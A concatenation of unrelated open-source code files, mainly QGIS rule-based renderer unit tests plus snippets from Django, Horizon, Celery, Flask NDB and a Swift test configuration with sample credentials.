renderer.startRender(ctx, vl.fields()) # build mActiveChlidren
rendered = renderer.willRenderFeature(ft, ctx)
renderer.stopRender(ctx)
renderer.rootRule().children()[0].setActive(True)
self.assertFalse(rendered)
renderer.startRender(ctx, vl.fields()) # build mActiveChlidren
rendered = renderer.willRenderFeature(ft, ctx)
renderer.stopRender(ctx)
self.assertTrue(rendered)
def testWillRenderFeatureNestedElse(self):
vl = self.mapsettings.layers()[0]
ft = vl.getFeature(0) # 'id' = 1
ctx = QgsRenderContext.fromMapSettings(self.mapsettings)
ctx.expressionContext().setFeature(ft)
# Create rulebased style
sym1 = QgsFillSymbol.createSimple({'color': '#fdbf6f', 'outline_color': 'black'})
sym2 = QgsFillSymbol.createSimple({'color': '#71bd6c', 'outline_color': 'black'})
sym3 = QgsFillSymbol.createSimple({'color': '#1f78b4', 'outline_color': 'black'})
self.rx1 = QgsRuleBasedRenderer.Rule(sym1, 0, 0, '"id" = 1')
self.rx2 = QgsRuleBasedRenderer.Rule(sym2, 0, 0, '"id" = 2')
self.rx3 = QgsRuleBasedRenderer.Rule(sym3, 0, 0, 'ELSE')
self.rx3.appendChild(self.rx1)
rootrule = QgsRuleBasedRenderer.Rule(None)
rootrule.appendChild(self.rx2)
rootrule.appendChild(self.rx3)
vl.setRenderer(QgsRuleBasedRenderer(rootrule))
renderer = vl.renderer()
# Render with else rule and all activated
renderer.startRender(ctx, vl.fields())
self.assertTrue(renderer.willRenderFeature(ft, ctx))
renderer.stopRender(ctx)
# Render with else rule where else is deactivated
renderer.rootRule().children()[1].setActive(False)
renderer.startRender(ctx, vl.fields())
self.assertFalse(renderer.willRenderFeature(ft, ctx))
renderer.stopRender(ctx)
def testFeatureCount(self):
vl = self.mapsettings.layers()[0]
ft = vl.getFeature(2) # 'id' = 3 => ELSE
renderer = vl.renderer()
ctx = QgsRenderContext.fromMapSettings(self.mapsettings)
ctx.expressionContext().setFeature(ft)
counter = vl.countSymbolFeatures()
counter.waitForFinished()
renderer.startRender(ctx, vl.fields())
elseRule = None
for rule in renderer.rootRule().children():
if rule.filterExpression() == 'ELSE':
elseRule = rule
self.assertIsNotNone(elseRule)
cnt = counter.featureCount(elseRule.ruleKey())
self.assertEqual(cnt, 1)
def testRefineWithCategories(self):
# Test refining rule with categories (refs #10815)
# First, try with a field based category (id)
cats = []
cats.append(QgsRendererCategory(1, QgsMarkerSymbol(), "id 1"))
cats.append(QgsRendererCategory(2, QgsMarkerSymbol(), ''))
cats.append(QgsRendererCategory(None, QgsMarkerSymbol(), ''))
c = QgsCategorizedSymbolRenderer("id", cats)
QgsRuleBasedRenderer.refineRuleCategories(self.r2, c)
self.assertEqual(self.r2.children()[0].filterExpression(), '"id" = 1')
self.assertEqual(self.r2.children()[1].filterExpression(), '"id" = 2')
self.assertEqual(self.r2.children()[0].label(), 'id 1')
self.assertEqual(self.r2.children()[1].label(), '2')
self.assertEqual(self.r2.children()[2].label(), '')
# Next try with an expression based category
cats = []
cats.append(QgsRendererCategory(1, QgsMarkerSymbol(), "result 1"))
cats.append(QgsRendererCategory(2, QgsMarkerSymbol(), "result 2"))
c = QgsCategorizedSymbolRenderer("id + 1", cats)
QgsRuleBasedRenderer.refineRuleCategories(self.r1, c)
self.assertEqual(self.r1.children()[0].filterExpression(), 'id + 1 = 1')
self.assertEqual(self.r1.children()[1].filterExpression(), 'id + 1 = 2')
self.assertEqual(self.r1.children()[0].label(), 'result 1')
self.assertEqual(self.r1.children()[1].label(), 'result 2')
# Last try with an expression which is just a quoted field name
cats = []
cats.append(QgsRendererCategory(1, QgsMarkerSymbol(), "result 1"))
cats.append(QgsRendererCategory(2, QgsMarkerSymbol(), "result 2"))
c = QgsCategorizedSymbolRenderer('"id"', cats)
QgsRuleBasedRenderer.refineRuleCategories(self.r3, c)
self.assertEqual(self.r3.children()[0].filterExpression(), '"id" = 1')
self.assertEqual(self.r3.children()[1].filterExpression(), '"id" = 2')
self.assertEqual(self.r3.children()[0].label(), 'result 1')
self.assertEqual(self.r3.children()[1].label(), 'result 2')
def testRefineWithRanges(self):
# Test refining rule with ranges (refs #10815)
# First, try with a field based category (id)
ranges = []
ranges.append(QgsRendererRange(0, 1, QgsMarkerSymbol(), "0-1"))
ranges.append(QgsRendererRange(1, 2, QgsMarkerSymbol(), "1-2"))
g = QgsGraduatedSymbolRenderer("id", ranges)
QgsRuleBasedRenderer.refineRuleRanges(self.r2, g)
self.assertEqual(self.r2.children()[0].filterExpression(), '"id" >= 0.0000 AND "id" <= 1.0000')
self.assertEqual(self.r2.children()[1].filterExpression(), '"id" > 1.0000 AND "id" <= 2.0000')
# Next try with an expression based range
ranges = []
ranges.append(QgsRendererRange(0, 1, QgsMarkerSymbol(), "0-1"))
ranges.append(QgsRendererRange(1, 2, QgsMarkerSymbol(), "1-2"))
g = QgsGraduatedSymbolRenderer("id / 2", ranges)
QgsRuleBasedRenderer.refineRuleRanges(self.r1, g)
self.assertEqual(self.r1.children()[0].filterExpression(), '(id / 2) >= 0.0000 AND (id / 2) <= 1.0000')
self.assertEqual(self.r1.children()[1].filterExpression(), '(id / 2) > 1.0000 AND (id / 2) <= 2.0000')
# Last try with an expression which is just a quoted field name
ranges = []
ranges.append(QgsRendererRange(0, 1, QgsMarkerSymbol(), "0-1"))
ranges.append(QgsRendererRange(1, 2, QgsMarkerSymbol(), "1-2"))
g = QgsGraduatedSymbolRenderer('"id"', ranges)
QgsRuleBasedRenderer.refineRuleRanges(self.r3, g)
self.assertEqual(self.r3.children()[0].filterExpression(), '"id" >= 0.0000 AND "id" <= 1.0000')
self.assertEqual(self.r3.children()[1].filterExpression(), '"id" > 1.0000 AND "id" <= 2.0000')
def testConvertFromCategorisedRenderer(self):
# Test converting categorised renderer to rule based
# First, try with a field based category (id)
cats = []
cats.append(QgsRendererCategory(1, QgsMarkerSymbol(), "id 1"))
cats.append(QgsRendererCategory(2, QgsMarkerSymbol(), "id 2"))
cats.append(QgsRendererCategory('a\'b', QgsMarkerSymbol(), "id a'b"))
cats.append(QgsRendererCategory('a\nb', QgsMarkerSymbol(), "id a\\nb"))
cats.append(QgsRendererCategory('a\\b', QgsMarkerSymbol(), "id a\\\\b"))
cats.append(QgsRendererCategory('a\tb', QgsMarkerSymbol(), "id a\\tb"))
cats.append(QgsRendererCategory(['c', 'd'], QgsMarkerSymbol(), "c/d"))
c = QgsCategorizedSymbolRenderer("id", cats)
r = QgsRuleBasedRenderer.convertFromRenderer(c)
self.assertEqual(len(r.rootRule().children()), 7)
self.assertEqual(r.rootRule().children()[0].filterExpression(), '"id" = 1')
self.assertEqual(r.rootRule().children()[1].filterExpression(), '"id" = 2')
self.assertEqual(r.rootRule().children()[2].filterExpression(), '"id" = \'a\'\'b\'')
self.assertEqual(r.rootRule().children()[3].filterExpression(), '"id" = \'a\\nb\'')
self.assertEqual(r.rootRule().children()[4].filterExpression(), '"id" = \'a\\\\b\'')
self.assertEqual(r.rootRule().children()[5].filterExpression(), '"id" = \'a\\tb\'')
self.assertEqual(r.rootRule().children()[6].filterExpression(), '"id" IN (\'c\',\'d\')')
# Next try with an expression based category
cats = []
cats.append(QgsRendererCategory(1, QgsMarkerSymbol(), "result 1"))
cats.append(QgsRendererCategory(2, QgsMarkerSymbol(), "result 2"))
cats.append(QgsRendererCategory([3, 4], QgsMarkerSymbol(), "result 3/4"))
c = QgsCategorizedSymbolRenderer("id + 1", cats)
r = QgsRuleBasedRenderer.convertFromRenderer(c)
self.assertEqual(len(r.rootRule().children()), 3)
self.assertEqual(r.rootRule().children()[0].filterExpression(), 'id + 1 = 1')
self.assertEqual(r.rootRule().children()[1].filterExpression(), 'id + 1 = 2')
self.assertEqual(r.rootRule().children()[2].filterExpression(), 'id + 1 IN (3,4)')
# Last try with an expression which is just a quoted field name
cats = []
cats.append(QgsRendererCategory(1, QgsMarkerSymbol(), "result 1"))
cats.append(QgsRendererCategory(2, QgsMarkerSymbol(), "result 2"))
cats.append(QgsRendererCategory([3, 4], QgsMarkerSymbol(), "result 3/4"))
c = QgsCategorizedSymbolRenderer('"id"', cats)
r = QgsRuleBasedRenderer.convertFromRenderer(c)
self.assertEqual(len(r.rootRule().children()), 3)
self.assertEqual(r.rootRule().children()[0].filterExpression(), '"id" = 1')
self.assertEqual(r.rootRule().children()[1].filterExpression(), '"id" = 2')
self.assertEqual(r.rootRule().children()[2].filterExpression(), '"id" IN (3,4)')
def testConvertFromGraduatedRenderer(self):
# Test converting graduated renderer to rule based
# First, try with a field based category (id)
ranges = []
ranges.append(QgsRendererRange(0, 1, QgsMarkerSymbol(), "0-1"))
ranges.append(QgsRendererRange(1, 2, QgsMarkerSymbol(), "1-2"))
g = QgsGraduatedSymbolRenderer("id", ranges)
r = QgsRuleBasedRenderer.convertFromRenderer(g)
self.assertEqual(r.rootRule().children()[0].filterExpression(), '"id" >= 0.000000 AND "id" <= 1.000000')
self.assertEqual(r.rootRule().children()[1].filterExpression(), '"id" > 1.000000 AND "id" <= 2.000000')
# Next try with an expression based range
ranges = []
ranges.append(QgsRendererRange(0, 1, QgsMarkerSymbol(), "0-1"))
ranges.append(QgsRendererRange(1, 2, QgsMarkerSymbol(), "1-2"))
g = QgsGraduatedSymbolRenderer("id / 2", ranges)
r = QgsRuleBasedRenderer.convertFromRenderer(g)
self.assertEqual(r.rootRule().children()[0].filterExpression(), '(id / 2) >= 0.000000 AND (id / 2) <= 1.000000')
self.assertEqual(r.rootRule().children()[1].filterExpression(), '(id / 2) > 1.000000 AND (id / 2) <= 2.000000')
# Last try with an expression which is just a quoted field name
ranges = []
ranges.append(QgsRendererRange(0, 1, QgsMarkerSymbol(), "0-1"))
ranges.append(QgsRendererRange(1, 2, QgsMarkerSymbol(), "1-2"))
g = QgsGraduatedSymbolRenderer('"id"', ranges)
r = QgsRuleBasedRenderer.convertFromRenderer(g)
self.assertEqual(r.rootRule().children()[0].filterExpression(), '"id" >= 0.000000 AND "id" <= 1.000000')
self.assertEqual(r.rootRule().children()[1].filterExpression(), '"id" > 1.000000 AND "id" <= 2.000000')
def testWillRenderFeatureTwoElse(self):
"""Regression #21287, also test rulesForFeature since there were no tests any where and I've found a couple of issues"""
vl = self.mapsettings.layers()[0]
ft = vl.getFeature(0) # 'id' = 1
ctx = QgsRenderContext.fromMapSettings(self.mapsettings)
ctx.expressionContext().setFeature(ft)
# Create rulebased style
sym2 = QgsFillSymbol.createSimple({'color': '#71bd6c', 'outline_color': 'black'})
sym3 = QgsFillSymbol.createSimple({'color': '#1f78b4', 'outline_color': 'black'})
sym4 = QgsFillSymbol.createSimple({'color': '#ff00ff', 'outline_color': 'black'})
self.rx2 = QgsRuleBasedRenderer.Rule(sym2, 0, 0, '"id" = 200')
self.rx3 = QgsRuleBasedRenderer.Rule(sym3, 1000, 100000000, 'ELSE') # <<< - match this!
self.rx4 = QgsRuleBasedRenderer.Rule(sym4, 0.1, 999, 'ELSE')
rootrule = QgsRuleBasedRenderer.Rule(None)
rootrule.appendChild(self.rx2)
rootrule.appendChild(self.rx3)
rootrule.appendChild(self.rx4) # <- failed in regression #21287
vl.setRenderer(QgsRuleBasedRenderer(rootrule))
renderer = vl.renderer()
# Render with else rule and all activated
renderer.startRender(ctx, vl.fields())
self.assertTrue(renderer.willRenderFeature(ft, ctx))
# No context? All rules
self.assertEqual(len(rootrule.rulesForFeature(ft)), 2)
self.assertTrue(set(rootrule.rulesForFeature(ft)), set([self.rx3, self.rx4]))
# With context: only the matching one
self.assertEqual(len(rootrule.rulesForFeature(ft, ctx)), 1)
self.assertEqual(rootrule.rulesForFeature(ft, ctx)[0], self.rx3)
renderer.stopRender(ctx)
def testUsedAttributes(self):
ctx = QgsRenderContext.fromMapSettings(self.mapsettings)
# Create rulebased style
sym2 = QgsFillSymbol.createSimple({'color': '#71bd6c', 'outline_color': 'black'})
sym3 = QgsFillSymbol.createSimple({'color': '#1f78b4', 'outline_color': 'black'})
self.rx2 = QgsRuleBasedRenderer.Rule(sym2, 0, 0, '"id" = 200')
self.rx3 = QgsRuleBasedRenderer.Rule(sym3, 1000, 100000000, 'ELSE')
rootrule = QgsRuleBasedRenderer.Rule(None)
rootrule.appendChild(self.rx2)
rootrule.appendChild(self.rx3)
renderer = QgsRuleBasedRenderer(rootrule)
self.assertCountEqual(renderer.usedAttributes(ctx), {'id'})
def testPointsUsedAttributes(self):
points_shp = os.path.join(TEST_DATA_DIR, 'points.shp')
points_layer = QgsVectorLayer(points_shp, 'Points', 'ogr')
QgsProject.instance().addMapLayer(points_layer)
# Create rulebased style
sym1 = QgsMarkerSymbol()
l1 = QgsSimpleMarkerSymbolLayer(QgsSimpleMarkerSymbolLayer.Triangle, 5)
l1.setColor(QColor(255, 0, 0))
l1.setStrokeStyle(Qt.NoPen)
l1.setDataDefinedProperty(QgsSymbolLayer.PropertyAngle, QgsProperty.fromField("Heading"))
sym1.changeSymbolLayer(0, l1)
sym2 = QgsMarkerSymbol()
l2 = QgsSimpleMarkerSymbolLayer(QgsSimpleMarkerSymbolLayer.Triangle, 5)
l2.setColor(QColor(0, 255, 0))
l2.setStrokeStyle(Qt.NoPen)
l2.setDataDefinedProperty(QgsSymbolLayer.PropertyAngle, QgsProperty.fromField("Heading"))
sym2.changeSymbolLayer(0, l2)
sym3 = QgsMarkerSymbol()
l3 = QgsSimpleMarkerSymbolLayer(QgsSimpleMarkerSymbolLayer.Triangle, 5)
l3.setColor(QColor(0, 0, 255))
l3.setStrokeStyle(Qt.NoPen)
l3.setDataDefinedProperty(QgsSymbolLayer.PropertyAngle, QgsProperty.fromField("Heading"))
sym3.changeSymbolLayer(0, l3)
r1 = QgsRuleBasedRenderer.Rule(sym1, 0, 0, '"Class" = \'B52\'')
r2 = QgsRuleBasedRenderer.Rule(sym2, 0, 0, '"Class" = \'Biplane\'')
r3 = QgsRuleBasedRenderer.Rule(sym3, 0, 0, '"Class" = \'Jet\'')
rootrule = QgsRuleBasedRenderer.Rule(None)
rootrule.appendChild(r1)
rootrule.appendChild(r2)
rootrule.appendChild(r3)
renderer = QgsRuleBasedRenderer(rootrule)
points_layer.setRenderer(renderer)
ms = QgsMapSettings()
ms.setOutputSize(QSize(400, 400))
ms.setOutputDpi(96)
ms.setExtent(QgsRectangle(-133, 22, -70, 52))
ms.setLayers([points_layer])
ctx = QgsRenderContext.fromMapSettings(ms)
ctx.expressionContext().appendScope(points_layer.createExpressionContextScope())
# for symbol layer
self.assertCountEqual(l1.usedAttributes(ctx), {'Heading'})
# for symbol
self.assertCountEqual(sym1.usedAttributes(ctx), {'Heading'})
# for symbol renderer
self.assertCountEqual(renderer.usedAttributes(ctx), {'Class', 'Heading'})
QgsProject.instance().removeMapLayer(points_layer)
def testConvertFromEmbedded(self):
"""
Test converting an embedded symbol renderer to a rule based renderer
"""
points_layer = QgsVectorLayer('Point', 'Polys', 'memory')
f = QgsFeature()
f.setGeometry(QgsGeometry.fromWkt('Point(-100 30)'))
f.setEmbeddedSymbol(
QgsMarkerSymbol.createSimple({'name': 'triangle', 'size': 10, 'color': '#ff0000', 'outline_style': 'no'}))
self.assertTrue(points_layer.dataProvider().addFeature(f))
f.setGeometry(QgsGeometry.fromWkt('Point(-110 40)'))
f.setEmbeddedSymbol(
QgsMarkerSymbol.createSimple({'name': 'square', 'size': 7, 'color': '#00ff00', 'outline_style': 'no'}))
self.assertTrue(points_layer.dataProvider().addFeature(f))
f.setGeometry(QgsGeometry.fromWkt('Point(-90 50)'))
f.setEmbeddedSymbol(None)
self.assertTrue(points_layer.dataProvider().addFeature(f))
renderer = QgsEmbeddedSymbolRenderer(defaultSymbol=QgsMarkerSymbol.createSimple({'name': 'star', 'size': 10, 'color': '#ff00ff', 'outline_style': 'no'}))
points_layer.setRenderer(renderer)
rule_based = QgsRuleBasedRenderer.convertFromRenderer(renderer, points_layer)
self.assertEqual(len(rule_based.rootRule().children()), 3)
rule_0 = rule_based.rootRule().children()[0]
self.assertEqual(rule_0.filterExpression(), '$id=1')
self.assertEqual(rule_0.label(), '1')
self.assertEqual(rule_0.symbol().color().name(), '#ff0000')
rule_1 = rule_based.rootRule().children()[1]
self.assertEqual(rule_1.filterExpression(), '$id=2')
self.assertEqual(rule_1.label(), '2')
self.assertEqual(rule_1.symbol().color().name(), '#00ff00')
rule_2 = rule_based.rootRule().children()[2]
self.assertEqual(rule_2.filterExpression(), 'ELSE')
self.assertEqual(rule_2.label(), 'All other features')
self.assertEqual(rule_2.symbol().color().name(), '#ff00ff')
if __name__ == '__main__':
unittest.main()
|
rduivenvoorde/QGIS
|
tests/src/python/test_qgsrulebasedrenderer.py
|
Python
|
gpl-2.0
| 23,130 | 0.002335 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('users', '0019_auto_20140909_1253'),
]
operations = [
migrations.AlterModelOptions(
name='donationitemcategory',
options={'verbose_name_plural': 'Donation item categories'},
),
migrations.AddField(
model_name='volunteeractivitytype',
name='color',
field=models.CharField(default='red', max_length=64, choices=[(b'red', b'Red'), (b'green', b'Green'), (b'purple', b'Purple')]),
preserve_default=False,
),
migrations.AlterField(
model_name='donationitem',
name='requirement',
field=models.ForeignKey(related_name=b'items', to='users.DonationRequirement'),
),
]
|
klpdotorg/dubdubdub
|
apps/users/migrations/0020_auto_20140925_1129.py
|
Python
|
mit
| 905 | 0.00221 |
# coding=utf-8
# Copyright 2020 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# this script reports modified .py files under the desired list of top-level sub-dirs passed as a list of arguments, e.g.:
# python ./utils/get_modified_files.py utils src tests examples
#
# it uses git to find the forking point and which files were modified - i.e. files not under git won't be considered
# since the output of this script is fed into Makefile commands it doesn't print a newline after the results
import re
import subprocess
import sys
fork_point_sha = subprocess.check_output("git merge-base master HEAD".split()).decode("utf-8")
modified_files = subprocess.check_output(f"git diff --name-only {fork_point_sha}".split()).decode("utf-8").split()
joined_dirs = "|".join(sys.argv[1:])
regex = re.compile(fr"^({joined_dirs}).*?\.py$")
relevant_modified_files = [x for x in modified_files if regex.match(x)]
print(" ".join(relevant_modified_files), end="")
|
huggingface/pytorch-transformers
|
utils/get_modified_files.py
|
Python
|
apache-2.0
| 1,484 | 0.003369 |
# ------------------------------------------------------------------------------
#
class Attributes (object) :
# FIXME: add method sigs
# --------------------------------------------------------------------------
#
def __init__ (self, vals={}) :
raise Exception ("%s is not implemented" % self.__class__.__name__)
# ------------------------------------------------------------------------------
#
|
JensTimmerman/radical.pilot
|
docs/architecture/api_draft/attributes.py
|
Python
|
mit
| 430 | 0.011628 |
'''-------------------------------------------------------------------------
Copyright IBM Corp. 2015, 2015 All Rights Reserved
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
Limitations under the License.
-------------------------------------------------------------------------'''
'''
IMPORTANT: Make sure the variables AUTH_PI and KEYSTONE_IP point to the system
you are testing!!!
'''
'''------------------------------------------------------------------------'''
# Establishing Swift connection, user ID, etc
PROXY_PROTOCOL = 'HTTP'
AUTH_PROTOCOL = 'HTTP'
DEV_AUTH_IP = '9.26.19.179'
AUTH_IP = DEV_AUTH_IP
PROXY_PORT = '80'
AUTH_PORT = '5000'
ACCOUNT = 'service'
USER_NAME = 'swift'
PASSWORD = 'passw0rd'
|
hroumani/genericStorletStore
|
storletDeploy/sys_test_params.py
|
Python
|
apache-2.0
| 1,153 | 0 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('labman_setup', '0003_googlesearchscript'),
]
operations = [
migrations.AddField(
model_name='labmandeploygeneralsettings',
name='background_color',
field=models.CharField(max_length=25, null=True, blank=True),
preserve_default=True,
),
]
|
morelab/labman_ud
|
labman_ud/labman_setup/migrations/0004_labmandeploygeneralsettings_background_color.py
|
Python
|
gpl-3.0
| 494 | 0 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from django import template
from django.utils.datastructures import SortedDict # noqa
from django.utils.encoding import force_unicode # noqa
from django.utils.translation import ugettext_lazy as _ # noqa
from horizon.base import Horizon # noqa
from horizon import conf
register = template.Library()
@register.filter
def has_permissions(user, component):
"""
Checks if the given user meets the permissions requirements for
the component.
"""
return user.has_perms(getattr(component, 'permissions', set()))
@register.filter
def has_permissions_on_list(components, user):
return [component for component
in components if has_permissions(user, component)]
@register.inclusion_tag('horizon/_nav_list.html', takes_context=True)
def horizon_main_nav(context):
""" Generates top-level dashboard navigation entries. """
if 'request' not in context:
return {}
current_dashboard = context['request'].horizon.get('dashboard', None)
dashboards = []
for dash in Horizon.get_dashboards():
if callable(dash.nav) and dash.nav(context):
dashboards.append(dash)
elif dash.nav:
dashboards.append(dash)
return {'components': dashboards,
'user': context['request'].user,
'current': current_dashboard,
'request': context['request'],
'showOnlyComponent' : _("Federation")}
@register.inclusion_tag('horizon/_subnav_list.html', takes_context=True)
def horizon_dashboard_nav(context):
""" Generates sub-navigation entries for the current dashboard. """
if 'request' not in context:
return {}
dashboard = context['request'].horizon['dashboard']
panel_groups = dashboard.get_panel_groups()
non_empty_groups = []
for group in panel_groups.values():
allowed_panels = []
for panel in group:
if callable(panel.nav) and panel.nav(context):
allowed_panels.append(panel)
elif not callable(panel.nav) and panel.nav:
allowed_panels.append(panel)
if allowed_panels:
non_empty_groups.append((group.name, allowed_panels))
return {'components': SortedDict(non_empty_groups),
'user': context['request'].user,
'current': context['request'].horizon['panel'].slug,
'request': context['request']}
@register.filter
def quota(val, units=None):
if val == float("inf"):
return _("No Limit")
elif units is not None:
return "%s %s %s" % (val, units, force_unicode(_("Available")))
else:
return "%s %s" % (val, force_unicode(_("Available")))
class JSTemplateNode(template.Node):
""" Helper node for the ``jstemplate`` template tag. """
def __init__(self, nodelist):
self.nodelist = nodelist
def render(self, context, ):
output = self.nodelist.render(context)
output = output.replace('[[[', '{{{').replace(']]]', '}}}')
output = output.replace('[[', '{{').replace(']]', '}}')
output = output.replace('[%', '{%').replace('%]', '%}')
return output
@register.tag
def jstemplate(parser, token):
"""
Replaces ``[[[`` and ``]]]`` with ``{{{`` and ``}}}``,
``[[`` and ``]]`` with ``{{`` and ``}}`` and
``[%`` and ``%]`` with ``{%`` and ``%}`` to avoid conflicts
with Django's template engine when using any of the Mustache-based
templating libraries.
"""
nodelist = parser.parse(('endjstemplate',))
parser.delete_first_token()
return JSTemplateNode(nodelist)
@register.assignment_tag
def load_config():
return conf.HORIZON_CONFIG
|
fogbow/fogbow-dashboard
|
horizon/templatetags/horizon.py
|
Python
|
apache-2.0
| 4,349 | 0.00046 |
"""Monitor the transaction log for changes that should be synced back to the
account backend.
TODO(emfree):
* Track syncback failure/success state, and implement retries
(syncback actions may be lost if the service restarts while actions are
still pending).
* Add better logging.
"""
import gevent
from sqlalchemy import asc, func
from inbox.util.concurrency import retry_with_logging
from inbox.log import get_logger
from inbox.models.session import session_scope
from inbox.models import ActionLog, Namespace
from inbox.actions import (mark_read, mark_unread, archive, unarchive, star,
unstar, save_draft, delete_draft, mark_spam,
unmark_spam, mark_trash, unmark_trash, send_draft)
ACTION_FUNCTION_MAP = {
'archive': archive,
'unarchive': unarchive,
'mark_read': mark_read,
'mark_unread': mark_unread,
'star': star,
'unstar': unstar,
'mark_spam': mark_spam,
'unmark_spam': unmark_spam,
'mark_trash': mark_trash,
'unmark_trash': unmark_trash,
'send_draft': send_draft,
'save_draft': save_draft,
'delete_draft': delete_draft
}
class SyncbackService(gevent.Greenlet):
"""Asynchronously consumes the action log and executes syncback actions."""
def __init__(self, poll_interval=1, chunk_size=22, max_pool_size=22):
self.log = get_logger()
self.worker_pool = gevent.pool.Pool(max_pool_size)
self.poll_interval = poll_interval
self.chunk_size = chunk_size
with session_scope() as db_session:
# Just start working from the head of the log.
# TODO(emfree): once we can do retry, persist a pointer into the
# transaction log and advance it only on syncback success.
self.minimum_id, = db_session.query(
func.max(ActionLog.id)).one()
if self.minimum_id is None:
self.minimum_id = -1
gevent.Greenlet.__init__(self)
def _process_log(self):
# TODO(emfree) handle the case that message/thread objects may have
# been deleted in the interim
with session_scope() as db_session:
query = db_session.query(ActionLog). \
filter(ActionLog.id > self.minimum_id). \
order_by(asc(ActionLog.id)).yield_per(self.chunk_size)
for log_entry in query:
self.minimum_id = log_entry.id
action_function = ACTION_FUNCTION_MAP[log_entry.action]
namespace = db_session.query(Namespace). \
get(log_entry.namespace_id)
self._execute_async_action(action_function,
namespace.account_id,
log_entry.record_id)
def _execute_async_action(self, func, *args):
self.log.info('Scheduling syncback action', func=func, args=args)
g = gevent.Greenlet(retry_with_logging, lambda: func(*args),
logger=self.log)
g.link_value(lambda _: self.log.info('Syncback action completed',
func=func, args=args))
self.worker_pool.start(g)
def _run_impl(self):
self.log.info('Starting action service')
while True:
self._process_log()
gevent.sleep(self.poll_interval)
def _run(self):
retry_with_logging(self._run_impl, self.log)
|
rmasters/inbox
|
inbox/transactions/actions.py
|
Python
|
agpl-3.0
| 3,454 | 0 |
# Copyright 2019 Google LLC All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START ndb_flask]
from flask import Flask
from google.cloud import ndb
client = ndb.Client()
def ndb_wsgi_middleware(wsgi_app):
def middleware(environ, start_response):
with client.context():
return wsgi_app(environ, start_response)
return middleware
app = Flask(__name__)
app.wsgi_app = ndb_wsgi_middleware(app.wsgi_app) # Wrap the app in middleware.
class Book(ndb.Model):
title = ndb.StringProperty()
@app.route('/')
def list_books():
books = Book.query()
return str([book.to_dict() for book in books])
# [END ndb_flask]
|
GoogleCloudPlatform/python-docs-samples
|
datastore/cloud-ndb/flask_app.py
|
Python
|
apache-2.0
| 1,175 | 0 |
"""
Command.py
"""
from abc import ABCMeta, abstractmethod
class Command(object):
__metaclass__ = ABCMeta
@abstractmethod
def execute(self):
pass
@abstractmethod
def unexecute(self):
pass
|
Sunhick/design-patterns
|
Behavioral/Command/Command.py
|
Python
|
gpl-3.0
| 230 | 0.008696 |
from __future__ import absolute_import, unicode_literals
from case import Mock
from celery.worker.heartbeat import Heart
class MockDispatcher(object):
heart = None
next_iter = 0
def __init__(self):
self.sent = []
self.on_enabled = set()
self.on_disabled = set()
self.enabled = True
def send(self, msg, **_fields):
self.sent.append(msg)
if self.heart:
if self.next_iter > 10:
self.heart._shutdown.set()
self.next_iter += 1
class MockTimer(object):
def call_repeatedly(self, secs, fun, args=(), kwargs={}):
class entry(tuple):
canceled = False
def cancel(self):
self.canceled = True
return entry((secs, fun, args, kwargs))
def cancel(self, entry):
entry.cancel()
class test_Heart:
def test_start_stop(self):
timer = MockTimer()
eventer = MockDispatcher()
h = Heart(timer, eventer, interval=1)
h.start()
assert h.tref
h.stop()
assert h.tref is None
h.stop()
def test_send_sends_signal(self):
h = Heart(MockTimer(), MockDispatcher(), interval=1)
h._send_sent_signal = None
h._send('worker-heartbeat')
h._send_sent_signal = Mock(name='send_sent_signal')
h._send('worker')
h._send_sent_signal.assert_called_with(sender=h)
def test_start_when_disabled(self):
timer = MockTimer()
eventer = MockDispatcher()
eventer.enabled = False
h = Heart(timer, eventer)
h.start()
assert not h.tref
def test_stop_when_disabled(self):
timer = MockTimer()
eventer = MockDispatcher()
eventer.enabled = False
h = Heart(timer, eventer)
h.stop()
|
kawamon/hue
|
desktop/core/ext-py/celery-4.2.1/t/unit/worker/test_heartbeat.py
|
Python
|
apache-2.0
| 1,829 | 0 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from xml.parsers.expat import ParserCreate
class DefaultSaxHandler(object):
def start_element(self, name, attrs):
print('sax:start_element: %s, attrs: %s' % (name, str(attrs)))
def end_element(self, name):
print('sax:end_element: %s' % name)
def char_data(self, text):
print('sax:char_data: %s' % text)
xml = r'''<?xml version="1.0"?>
<ol>
<li><a href="/python">Python</a></li>
<li><a href="/ruby">Ruby</a></li>
</ol>
'''
handler = DefaultSaxHandler()
parser = ParserCreate()
parser.StartElementHandler = handler.start_element
parser.EndElementHandler = handler.end_element
parser.CharacterDataHandler = handler.char_data
parser.Parse(xml)
|
whyDK37/py_bootstrap
|
samples/commonlib/use_sax.py
|
Python
|
apache-2.0
| 739 | 0 |
# Copyright 2013 dotCloud inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
